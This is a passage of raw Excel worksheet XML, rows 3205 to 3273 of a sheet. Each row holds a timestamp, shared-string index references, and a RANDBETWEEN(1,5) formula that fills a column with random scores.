      </c>
      <c r="F3205">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3206" s="1">
        <v>43497.543194444443</v>
      </c>
      <c r="B3206" t="s">
        <v>19</v>
      </c>
      <c r="C3206" t="s">
        <v>10</v>
      </c>
      <c r="D3206" t="s">
        <v>89</v>
      </c>
      <c r="E3206" t="s">
        <v>3132</v>
      </c>
      <c r="F3206">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3207" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3207" s="1">
        <v>43497.539861111109</v>
      </c>
      <c r="B3207" t="s">
        <v>13</v>
      </c>
      <c r="C3207" t="s">
        <v>140</v>
      </c>
      <c r="D3207" t="s">
        <v>847</v>
      </c>
      <c r="E3207" s="2" t="s">
        <v>3133</v>
      </c>
      <c r="F3207">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3208" s="1">
        <v>43497.538483796299</v>
      </c>
      <c r="B3208" t="s">
        <v>19</v>
      </c>
      <c r="C3208" t="s">
        <v>10</v>
      </c>
      <c r="D3208" t="s">
        <v>494</v>
      </c>
      <c r="E3208" t="s">
        <v>3134</v>
      </c>
      <c r="F3208">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3209" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3209" s="1">
        <v>43497.536226851851</v>
      </c>
      <c r="B3209" t="s">
        <v>19</v>
      </c>
      <c r="C3209" t="s">
        <v>10</v>
      </c>
      <c r="D3209" t="s">
        <v>56</v>
      </c>
      <c r="E3209" s="2" t="s">
        <v>3135</v>
      </c>
      <c r="F3209">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3210" s="1">
        <v>43497.528773148151</v>
      </c>
      <c r="B3210" t="s">
        <v>19</v>
      </c>
      <c r="C3210" t="s">
        <v>10</v>
      </c>
      <c r="D3210" t="s">
        <v>89</v>
      </c>
      <c r="E3210" t="s">
        <v>3136</v>
      </c>
      <c r="F3210">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3211" s="1">
        <v>43497.512974537036</v>
      </c>
      <c r="B3211" t="s">
        <v>19</v>
      </c>
      <c r="C3211" t="s">
        <v>6</v>
      </c>
      <c r="D3211" t="s">
        <v>25</v>
      </c>
      <c r="E3211" t="s">
        <v>3137</v>
      </c>
      <c r="F3211">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3212" s="1">
        <v>43497.509988425925</v>
      </c>
      <c r="B3212" t="s">
        <v>19</v>
      </c>
      <c r="C3212" t="s">
        <v>10</v>
      </c>
      <c r="D3212" t="s">
        <v>80</v>
      </c>
      <c r="E3212" t="s">
        <v>3138</v>
      </c>
      <c r="F3212">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3213" s="1">
        <v>43497.495451388888</v>
      </c>
      <c r="B3213" t="s">
        <v>5</v>
      </c>
      <c r="C3213" t="s">
        <v>10</v>
      </c>
      <c r="D3213" t="s">
        <v>41</v>
      </c>
      <c r="E3213" t="s">
        <v>3139</v>
      </c>
      <c r="F3213">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3214" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3214" s="1">
        <v>43497.494837962964</v>
      </c>
      <c r="B3214" t="s">
        <v>19</v>
      </c>
      <c r="C3214" t="s">
        <v>10</v>
      </c>
      <c r="D3214" t="s">
        <v>94</v>
      </c>
      <c r="E3214" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="F3214">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3215" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3215" s="1">
        <v>43497.492777777778</v>
      </c>
      <c r="B3215" t="s">
        <v>19</v>
      </c>
      <c r="C3215" t="s">
        <v>10</v>
      </c>
      <c r="D3215" t="s">
        <v>480</v>
      </c>
      <c r="E3215" s="2" t="s">
        <v>3141</v>
      </c>
      <c r="F3215">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3216" s="1">
        <v>43497.492129629631</v>
      </c>
      <c r="B3216" t="s">
        <v>13</v>
      </c>
      <c r="C3216" t="s">
        <v>41</v>
      </c>
      <c r="E3216" t="s">
        <v>3142</v>
      </c>
      <c r="F3216">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3217" s="1">
        <v>43497.492094907408</v>
      </c>
      <c r="B3217" t="s">
        <v>13</v>
      </c>
      <c r="C3217" t="s">
        <v>41</v>
      </c>
      <c r="E3217" t="s">
        <v>3142</v>
      </c>
      <c r="F3217">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3218" s="1">
        <v>43497.474039351851</v>
      </c>
      <c r="B3218" t="s">
        <v>19</v>
      </c>
      <c r="C3218" t="s">
        <v>10</v>
      </c>
      <c r="D3218" t="s">
        <v>52</v>
      </c>
      <c r="E3218" t="s">
        <v>3143</v>
      </c>
      <c r="F3218">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3219" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3219" s="1">
        <v>43497.434814814813</v>
      </c>
      <c r="B3219" t="s">
        <v>1305</v>
      </c>
      <c r="C3219" t="s">
        <v>10</v>
      </c>
      <c r="D3219" t="s">
        <v>86</v>
      </c>
      <c r="E3219" s="2" t="s">
        <v>3144</v>
      </c>
      <c r="F3219">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3220" s="1">
        <v>43497.403148148151</v>
      </c>
      <c r="B3220" t="s">
        <v>19</v>
      </c>
      <c r="C3220" t="s">
        <v>10</v>
      </c>
      <c r="D3220" t="s">
        <v>17</v>
      </c>
      <c r="E3220" t="s">
        <v>3145</v>
      </c>
      <c r="F3220">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3221" s="1">
        <v>43497.399259259262</v>
      </c>
      <c r="B3221" t="s">
        <v>19</v>
      </c>
      <c r="C3221" t="s">
        <v>10</v>
      </c>
      <c r="D3221" t="s">
        <v>36</v>
      </c>
      <c r="E3221" t="s">
        <v>3146</v>
      </c>
      <c r="F3221">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3222" s="1">
        <v>43497.394988425927</v>
      </c>
      <c r="B3222" t="s">
        <v>19</v>
      </c>
      <c r="C3222" t="s">
        <v>10</v>
      </c>
      <c r="D3222" t="s">
        <v>80</v>
      </c>
      <c r="E3222" t="s">
        <v>3147</v>
      </c>
      <c r="F3222">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3223" s="1">
        <v>43497.393750000003</v>
      </c>
      <c r="B3223" t="s">
        <v>19</v>
      </c>
      <c r="C3223" t="s">
        <v>50</v>
      </c>
      <c r="E3223" t="s">
        <v>3148</v>
      </c>
      <c r="F3223">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3224" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3224" s="1">
        <v>43497.388356481482</v>
      </c>
      <c r="B3224" t="s">
        <v>19</v>
      </c>
      <c r="C3224" t="s">
        <v>10</v>
      </c>
      <c r="D3224" t="s">
        <v>494</v>
      </c>
      <c r="E3224" s="2" t="s">
        <v>3149</v>
      </c>
      <c r="F3224">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3225" s="1">
        <v>43497.388136574074</v>
      </c>
      <c r="B3225" t="s">
        <v>5</v>
      </c>
      <c r="C3225" t="s">
        <v>3150</v>
      </c>
      <c r="F3225">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3226" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3226" s="1">
        <v>43497.38758101852</v>
      </c>
      <c r="B3226" t="s">
        <v>19</v>
      </c>
      <c r="C3226" t="s">
        <v>10</v>
      </c>
      <c r="D3226" t="s">
        <v>494</v>
      </c>
      <c r="E3226" s="2" t="s">
        <v>3149</v>
      </c>
      <c r="F3226">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3227" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3227" s="1">
        <v>43497.381388888891</v>
      </c>
      <c r="B3227" t="s">
        <v>5</v>
      </c>
      <c r="C3227" t="s">
        <v>10</v>
      </c>
      <c r="D3227" t="s">
        <v>36</v>
      </c>
      <c r="E3227" s="2" t="s">
        <v>3151</v>
      </c>
      <c r="F3227">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3228" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3228" s="1">
        <v>43497.376435185186</v>
      </c>
      <c r="B3228" t="s">
        <v>13</v>
      </c>
      <c r="C3228" t="s">
        <v>48</v>
      </c>
      <c r="E3228" s="2" t="s">
        <v>3152</v>
      </c>
      <c r="F3228">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3229" s="1">
        <v>43497.366585648146</v>
      </c>
      <c r="B3229" t="s">
        <v>35</v>
      </c>
      <c r="C3229" t="s">
        <v>73</v>
      </c>
      <c r="E3229" t="s">
        <v>2519</v>
      </c>
      <c r="F3229">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3230" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3230" s="1">
        <v>43497.363680555558</v>
      </c>
      <c r="B3230" t="s">
        <v>35</v>
      </c>
      <c r="C3230" t="s">
        <v>10</v>
      </c>
      <c r="D3230" t="s">
        <v>6</v>
      </c>
      <c r="E3230" s="2" t="s">
        <v>3153</v>
      </c>
      <c r="F3230">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3231" s="1">
        <v>43497.34615740741</v>
      </c>
      <c r="B3231" t="s">
        <v>19</v>
      </c>
      <c r="C3231" t="s">
        <v>41</v>
      </c>
      <c r="E3231" t="s">
        <v>3154</v>
      </c>
      <c r="F3231">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3232" s="1">
        <v>43497.343819444446</v>
      </c>
      <c r="B3232" t="s">
        <v>5</v>
      </c>
      <c r="C3232" t="s">
        <v>253</v>
      </c>
      <c r="E3232" t="s">
        <v>3155</v>
      </c>
      <c r="F3232">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3233" s="1">
        <v>43497.322245370371</v>
      </c>
      <c r="B3233" t="s">
        <v>5</v>
      </c>
      <c r="C3233" t="s">
        <v>71</v>
      </c>
      <c r="E3233" t="s">
        <v>3156</v>
      </c>
      <c r="F3233">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3234" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A3234" s="1">
        <v>43497.229062500002</v>
      </c>
      <c r="B3234" t="s">
        <v>19</v>
      </c>
      <c r="C3234" t="s">
        <v>48</v>
      </c>
      <c r="E3234" s="2" t="s">
        <v>3157</v>
      </c>
      <c r="F3234">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3235" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3235" s="1">
        <v>43497.185879629629</v>
      </c>
      <c r="B3235" t="s">
        <v>1305</v>
      </c>
      <c r="C3235" t="s">
        <v>41</v>
      </c>
      <c r="E3235" s="2" t="s">
        <v>3158</v>
      </c>
      <c r="F3235">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3236" s="1">
        <v>43497.160208333335</v>
      </c>
      <c r="B3236" t="s">
        <v>19</v>
      </c>
      <c r="C3236" t="s">
        <v>173</v>
      </c>
      <c r="E3236" t="s">
        <v>3159</v>
      </c>
      <c r="F3236">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3237" s="1">
        <v>43497.158935185187</v>
      </c>
      <c r="B3237" t="s">
        <v>5</v>
      </c>
      <c r="C3237" t="s">
        <v>41</v>
      </c>
      <c r="E3237" t="s">
        <v>3160</v>
      </c>
      <c r="F3237">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3238" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3238" s="1">
        <v>43497.154363425929</v>
      </c>
      <c r="B3238" t="s">
        <v>19</v>
      </c>
      <c r="C3238" t="s">
        <v>103</v>
      </c>
      <c r="E3238" s="2" t="s">
        <v>3161</v>
      </c>
      <c r="F3238">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3239" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A3239" s="1">
        <v>43497.062662037039</v>
      </c>
      <c r="B3239" t="s">
        <v>35</v>
      </c>
      <c r="C3239" t="s">
        <v>41</v>
      </c>
      <c r="E3239" s="2" t="s">
        <v>3162</v>
      </c>
      <c r="F3239">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3240" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3240" s="1">
        <v>43497.061215277776</v>
      </c>
      <c r="B3240" t="s">
        <v>19</v>
      </c>
      <c r="C3240" t="s">
        <v>73</v>
      </c>
      <c r="E3240" s="2" t="s">
        <v>3164</v>
      </c>
      <c r="F3240">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3241" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3241" s="1">
        <v>43496.961319444446</v>
      </c>
      <c r="B3241" t="s">
        <v>19</v>
      </c>
      <c r="C3241" t="s">
        <v>41</v>
      </c>
      <c r="E3241" s="2" t="s">
        <v>3165</v>
      </c>
      <c r="F3241">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3242" s="1">
        <v>43496.916643518518</v>
      </c>
      <c r="B3242" t="s">
        <v>35</v>
      </c>
      <c r="C3242" t="s">
        <v>226</v>
      </c>
      <c r="E3242" t="s">
        <v>3166</v>
      </c>
      <c r="F3242">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3243" s="1">
        <v>43496.871249999997</v>
      </c>
      <c r="B3243" t="s">
        <v>19</v>
      </c>
      <c r="C3243" t="s">
        <v>10</v>
      </c>
      <c r="D3243" t="s">
        <v>89</v>
      </c>
      <c r="E3243" t="s">
        <v>3167</v>
      </c>
      <c r="F3243">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3244" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3244" s="1">
        <v>43496.839942129627</v>
      </c>
      <c r="B3244" t="s">
        <v>19</v>
      </c>
      <c r="C3244" t="s">
        <v>118</v>
      </c>
      <c r="E3244" s="2" t="s">
        <v>3168</v>
      </c>
      <c r="F3244">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3245" s="1">
        <v>43496.817083333335</v>
      </c>
      <c r="B3245" t="s">
        <v>5</v>
      </c>
      <c r="C3245" t="s">
        <v>229</v>
      </c>
      <c r="E3245" t="s">
        <v>3169</v>
      </c>
      <c r="F3245">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3246" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3246" s="1">
        <v>43496.774918981479</v>
      </c>
      <c r="B3246" t="s">
        <v>13</v>
      </c>
      <c r="C3246" t="s">
        <v>10</v>
      </c>
      <c r="D3246" t="s">
        <v>6</v>
      </c>
      <c r="E3246" s="2" t="s">
        <v>3170</v>
      </c>
      <c r="F3246">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3247" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3247" s="1">
        <v>43496.758240740739</v>
      </c>
      <c r="B3247" t="s">
        <v>5</v>
      </c>
      <c r="C3247" t="s">
        <v>10</v>
      </c>
      <c r="D3247" t="s">
        <v>6</v>
      </c>
      <c r="E3247" s="2" t="s">
        <v>3171</v>
      </c>
      <c r="F3247">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3248" s="1">
        <v>43496.747696759259</v>
      </c>
      <c r="B3248" t="s">
        <v>13</v>
      </c>
      <c r="C3248" t="s">
        <v>260</v>
      </c>
      <c r="F3248">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3249" s="1">
        <v>43496.725972222222</v>
      </c>
      <c r="B3249" t="s">
        <v>5</v>
      </c>
      <c r="C3249" t="s">
        <v>10</v>
      </c>
      <c r="D3249" t="s">
        <v>6</v>
      </c>
      <c r="E3249" t="s">
        <v>3172</v>
      </c>
      <c r="F3249">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3250" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3250" s="1">
        <v>43496.714421296296</v>
      </c>
      <c r="B3250" t="s">
        <v>19</v>
      </c>
      <c r="C3250" t="s">
        <v>10</v>
      </c>
      <c r="D3250" t="s">
        <v>151</v>
      </c>
      <c r="E3250" s="2" t="s">
        <v>3173</v>
      </c>
      <c r="F3250">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3251" s="1">
        <v>43496.699988425928</v>
      </c>
      <c r="B3251" t="s">
        <v>5</v>
      </c>
      <c r="C3251" t="s">
        <v>10</v>
      </c>
      <c r="D3251" t="s">
        <v>52</v>
      </c>
      <c r="E3251" t="s">
        <v>3174</v>
      </c>
      <c r="F3251">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3252" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3252" s="1">
        <v>43496.667662037034</v>
      </c>
      <c r="B3252" t="s">
        <v>5</v>
      </c>
      <c r="C3252" t="s">
        <v>10</v>
      </c>
      <c r="D3252" t="s">
        <v>14</v>
      </c>
      <c r="E3252" s="2" t="s">
        <v>3175</v>
      </c>
      <c r="F3252">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3253" s="1">
        <v>43496.660069444442</v>
      </c>
      <c r="B3253" t="s">
        <v>1305</v>
      </c>
      <c r="C3253" t="s">
        <v>10</v>
      </c>
      <c r="D3253" t="s">
        <v>151</v>
      </c>
      <c r="E3253" t="s">
        <v>3176</v>
      </c>
      <c r="F3253">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3254" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3254" s="1">
        <v>43496.644305555557</v>
      </c>
      <c r="B3254" t="s">
        <v>5</v>
      </c>
      <c r="C3254" t="s">
        <v>48</v>
      </c>
      <c r="E3254" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="F3254">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3255" s="1">
        <v>43496.640879629631</v>
      </c>
      <c r="B3255" t="s">
        <v>19</v>
      </c>
      <c r="C3255" t="s">
        <v>10</v>
      </c>
      <c r="D3255" t="s">
        <v>36</v>
      </c>
      <c r="E3255" t="s">
        <v>3178</v>
      </c>
      <c r="F3255">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3256" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3256" s="1">
        <v>43496.640648148146</v>
      </c>
      <c r="B3256" t="s">
        <v>19</v>
      </c>
      <c r="C3256" t="s">
        <v>10</v>
      </c>
      <c r="D3256" t="s">
        <v>6</v>
      </c>
      <c r="E3256" s="2" t="s">
        <v>3179</v>
      </c>
      <c r="F3256">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3257" s="1">
        <v>43496.640497685185</v>
      </c>
      <c r="B3257" t="s">
        <v>1305</v>
      </c>
      <c r="C3257" t="s">
        <v>10</v>
      </c>
      <c r="D3257" t="s">
        <v>52</v>
      </c>
      <c r="E3257" t="s">
        <v>3180</v>
      </c>
      <c r="F3257">
        <f t="shared" ca="1" si="50"/>
        <v>4</v>
      </c>
    </row>
    <row r="3258" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3258" s="1">
        <v>43496.638240740744</v>
      </c>
      <c r="B3258" t="s">
        <v>19</v>
      </c>
      <c r="C3258" t="s">
        <v>6</v>
      </c>
      <c r="D3258" t="s">
        <v>194</v>
      </c>
      <c r="E3258" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="F3258">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3259" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3259" s="1">
        <v>43496.629606481481</v>
      </c>
      <c r="B3259" t="s">
        <v>19</v>
      </c>
      <c r="C3259" t="s">
        <v>10</v>
      </c>
      <c r="D3259" t="s">
        <v>36</v>
      </c>
      <c r="E3259" s="2" t="s">
        <v>3182</v>
      </c>
      <c r="F3259">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3260" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3260" s="1">
        <v>43496.627997685187</v>
      </c>
      <c r="B3260" t="s">
        <v>13</v>
      </c>
      <c r="C3260" t="s">
        <v>10</v>
      </c>
      <c r="D3260" t="s">
        <v>46</v>
      </c>
      <c r="E3260" s="2" t="s">
        <v>3183</v>
      </c>
      <c r="F3260">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3261" s="1">
        <v>43496.626469907409</v>
      </c>
      <c r="B3261" t="s">
        <v>5</v>
      </c>
      <c r="C3261" t="s">
        <v>197</v>
      </c>
      <c r="E3261" t="s">
        <v>3184</v>
      </c>
      <c r="F3261">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3262" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3262" s="1">
        <v>43496.61414351852</v>
      </c>
      <c r="B3262" t="s">
        <v>5</v>
      </c>
      <c r="C3262" t="s">
        <v>197</v>
      </c>
      <c r="E3262" s="2" t="s">
        <v>3185</v>
      </c>
      <c r="F3262">
        <f t="shared" ca="1" si="50"/>
        <v>1</v>
      </c>
    </row>
    <row r="3263" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3263" s="1">
        <v>43496.594652777778</v>
      </c>
      <c r="B3263" t="s">
        <v>19</v>
      </c>
      <c r="C3263" t="s">
        <v>10</v>
      </c>
      <c r="D3263" t="s">
        <v>163</v>
      </c>
      <c r="E3263" s="2" t="s">
        <v>3186</v>
      </c>
      <c r="F3263">
        <f t="shared" ca="1" si="50"/>
        <v>3</v>
      </c>
    </row>
    <row r="3264" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3264" s="1">
        <v>43496.594641203701</v>
      </c>
      <c r="B3264" t="s">
        <v>19</v>
      </c>
      <c r="C3264" t="s">
        <v>10</v>
      </c>
      <c r="D3264" t="s">
        <v>163</v>
      </c>
      <c r="E3264" s="2" t="s">
        <v>3186</v>
      </c>
      <c r="F3264">
        <f t="shared" ca="1" si="50"/>
        <v>2</v>
      </c>
    </row>
    <row r="3265" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3265" s="1">
        <v>43496.590555555558</v>
      </c>
      <c r="B3265" t="s">
        <v>19</v>
      </c>
      <c r="C3265" t="s">
        <v>50</v>
      </c>
      <c r="E3265" s="2" t="s">
        <v>3187</v>
      </c>
      <c r="F3265">
        <f t="shared" ca="1" si="50"/>
        <v>5</v>
      </c>
    </row>
    <row r="3266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3266" s="1">
        <v>43496.588969907411</v>
      </c>
      <c r="B3266" t="s">
        <v>13</v>
      </c>
      <c r="C3266" t="s">
        <v>10</v>
      </c>
      <c r="D3266" t="s">
        <v>23</v>
      </c>
      <c r="E3266" t="s">
        <v>3188</v>
      </c>
      <c r="F3266">
        <f t="shared" ref="F3266:F3329" ca="1" si="51">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3267" s="1">
        <v>43496.566319444442</v>
      </c>
      <c r="B3267" t="s">
        <v>5</v>
      </c>
      <c r="C3267" t="s">
        <v>6</v>
      </c>
      <c r="D3267" t="s">
        <v>25</v>
      </c>
      <c r="E3267" t="s">
        <v>3189</v>
      </c>
      <c r="F3267">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3268" s="1">
        <v>43496.534548611111</v>
      </c>
      <c r="B3268" t="s">
        <v>13</v>
      </c>
      <c r="C3268" t="s">
        <v>10</v>
      </c>
      <c r="D3268" t="s">
        <v>192</v>
      </c>
      <c r="E3268" t="s">
        <v>3190</v>
      </c>
      <c r="F3268">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3269" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3269" s="1">
        <v>43496.511990740742</v>
      </c>
      <c r="B3269" t="s">
        <v>19</v>
      </c>
      <c r="C3269" t="s">
        <v>10</v>
      </c>
      <c r="D3269" t="s">
        <v>330</v>
      </c>
      <c r="E3269" s="2" t="s">
        <v>3191</v>
      </c>
      <c r="F3269">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3270" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3270" s="1">
        <v>43496.50571759259</v>
      </c>
      <c r="B3270" t="s">
        <v>5</v>
      </c>
      <c r="C3270" t="s">
        <v>10</v>
      </c>
      <c r="D3270" t="s">
        <v>86</v>
      </c>
      <c r="E3270" s="2" t="s">
        <v>3192</v>
      </c>
      <c r="F3270">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3271" s="1">
        <v>43496.502766203703</v>
      </c>
      <c r="B3271" t="s">
        <v>19</v>
      </c>
      <c r="C3271" t="s">
        <v>10</v>
      </c>
      <c r="D3271" t="s">
        <v>222</v>
      </c>
      <c r="E3271" t="s">
        <v>3193</v>
      </c>
      <c r="F3271">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3272" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3272" s="1">
        <v>43496.499965277777</v>
      </c>
      <c r="B3272" t="s">
        <v>13</v>
      </c>
      <c r="C3272" t="s">
        <v>6</v>
      </c>
      <c r="D3272" t="s">
        <v>25</v>
      </c>
      <c r="E3272" s="2" t="s">
        <v>3194</v>
      </c>
      <c r="F3272">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3273" s="1">
        <v>43496.496967592589</v>
      </c>
      <c r="B3273" t="s">
        <v>13</v>
      </c>
      <c r="C3273" t="s">
        <v>10</v>
      </c>
      <c r="D3273" t="s">
        <v>89</v>
      </c>
      <c r="E3273" t="s">
